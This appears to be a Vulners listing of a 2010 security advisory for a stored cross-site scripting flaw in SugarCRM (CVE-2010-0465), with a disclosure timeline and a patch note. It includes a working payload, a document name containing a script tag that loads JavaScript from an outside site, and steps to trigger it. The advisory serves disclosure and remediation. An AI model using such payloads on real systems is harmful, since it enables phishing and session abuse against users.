Vulners
Lucene search
SugarCRM Cross Site Scripting
🗓️ 16 Mar 2010 00:00:00Reported by Jeromie JacksonType 
packetstorm🔗 packetstormsecurity.com👁 36 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | SugarCRM x<5.5.0a and 5.2.0l cross site scripting Vulnerability | 17 Mar 201000:00 | – | zdt |
 | CVE-2010-0465 | 19 Mar 201019:00 | – | cve |
 | CVE-2010-0465 | 19 Mar 201019:00 | – | cvelist |
 | EUVD-2010-0496 | 7 Oct 202500:30 | – | euvd |
 | CVE-2010-0465 | 19 Mar 201019:30 | – | nvd |
 | Cross site scripting | 19 Mar 201019:30 | – | prion |
 | SugarCRM Stored XSS vulnerability | 18 Mar 201000:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 18 Mar 201000:00 | – | securityvulns |
`Class: Stored Cross Site Scripting (XSS)
CVE: CVE-2010-0465
Remote: Yes
Local: Yes
Published: Jan 1, 2010 12:01AM
Timeline: Submission to Mitre: January 29, 2010
Vendor Contact: February 18, 2010
Vendor Response: February 19, 2010
Patch Available: March 10, 2010
Credit: Jeromie Jackson CISSP, CISM
COBIT & ITIL Certified
President- San Diego Open Web Application Security Project (OWASP)
Vice President- San Diego Information Audit & Control Association
(ISACA)
SANS Mentor
Blog: www.JeromieJackson.com
Twitter: www.twitter.com/Security_Sifu
Validated Vulnerable:
All previous version of SugarCRM prior to 5.5.0a and 5.2.0l
Discussion:
A Stored Cross-Site Scripting (XSS) vulnerability was found within
SugarCRM. The vulnerability is exploited through the online Documents
section of the application. By crafting a name that includes XSS code it
is possible to inject malicious data, redirect the user to a bogus
replica of the real website, or other nefariousactivity.
Exploit:
There are two ways that have been used to exploit this vulnerability. In
both instances, make a document with the following Document Name:
pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>
Example #1
Within the SugarCRM User Interface (UI) go to the Documents List. Click
on the one just created. This will execute the script. You will see the
script right in the document list- very obvious to most users that
something doesn't look right. The next example is slighly more covert.
Example #2
Within the SugarCRM UI go to the Document List. Hover over the Document
Name you just created, right-click, and then copy the URL location. You
will see the URL does not have any of the scripting, it has been
replaced with queries directly to a Record variable within the
application. This would probably be the tact a Phisher would take.
Solution:
A patch has been made available via the vendor. It is recommended a
routine to sanitize user input be consistently implemented throughout
the application to mitigate other such occurrences within the
application.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Mar 2010 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00285